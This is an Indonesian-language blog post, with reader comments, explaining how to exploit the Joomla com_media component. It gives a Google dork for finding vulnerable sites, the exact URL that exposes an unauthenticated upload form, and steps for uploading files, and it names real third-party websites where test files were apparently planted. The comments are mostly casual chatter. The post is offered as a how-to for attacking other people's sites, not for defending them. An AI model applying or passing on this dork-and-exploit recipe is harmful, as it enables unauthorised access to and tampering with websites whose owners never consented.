Now Trending:

Teknik Exploit Com_Media pada CMS Joomla

May 15, 2013 Uncategorized 28 Comments

Teknik Exploit Com_Media pada CMS Joomla – Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.
Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org . 
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :

4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.

Refrensi : http://komandanseo.blogspot.com/

Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

Tags:

28 Comments

  1. ope May 16, 2013 Reply

    Exploit com_media itu apa ya?

  2. Wahyu Dwi May 16, 2013 Reply

    rada nggak mudeng sob sama joomla 😀 hhehehe tapi pelan2 aja deh blajarnya 🙂

  3. Bung Penho May 16, 2013 Reply

    kalo bisa lebih rinci lagi nih tentang teknik ini buat apa?

    • chiaki May 16, 2013 Reply

      Ini post nya di label apa ? :p

  4. Info Seputar Bola May 16, 2013 Reply

    terimakasih sudah berbagi nih mas . rupanya bugs nya cukup mudah untuk d tembuss ..

  5. Rohis Facebook May 16, 2013 Reply

    nyimak aja deh gk bs komen apa2 soalx gk ngerti *smile

  6. imam sya' roni May 16, 2013 Reply

    meneruskan warisan nih kang dari sultan haikal 🙂 sipp

  7. mifta khuddin May 16, 2013 Reply

    mengapa php dan html gk bisa d'upload..??

  8. Mas Nady May 16, 2013 Reply

    kunjungan sore, nyimak saja dech sobat… nggak paham, hahahaha

  9. Muroi El-Barezy May 16, 2013 Reply

    Wah joomla, kayanya nyimak dulu sob, happy blogging

  10. aji Fauzan May 16, 2013 Reply

    mantep gan (y)

  11. Djangkaru Bumi May 16, 2013 Reply

    saya belajar joomla jadi pening sendiri.

  12. Muhammad Rafly May 16, 2013 Reply

    Gan Tukeran Link Yuk..
    Dah Ane Pasang Link Madura Di Blog Ane Cek Yo..
    http://mrr-cyber.blogspot.com/p/link-exchange_1033.html

  13. Wahyu Dwi May 17, 2013 Reply

    kunjungan pagi sob 🙂

  14. Cirebon-Cyber4rt May 17, 2013 Reply

    paling suka ane kalo post gini hehehe 😀

    oh iya lama juga ngga BW dimari, apa kabar gan? 🙂

  15. Mas Nady May 17, 2013 Reply

    wah saya nyimak saja dech sob.. saya masih awam banget sama yang beginian hehehehe

  16. Anonim May 30, 2013 Reply

    Blog Cacad

    • Anonim June 5, 2013 Reply

      asu

Leave a Reply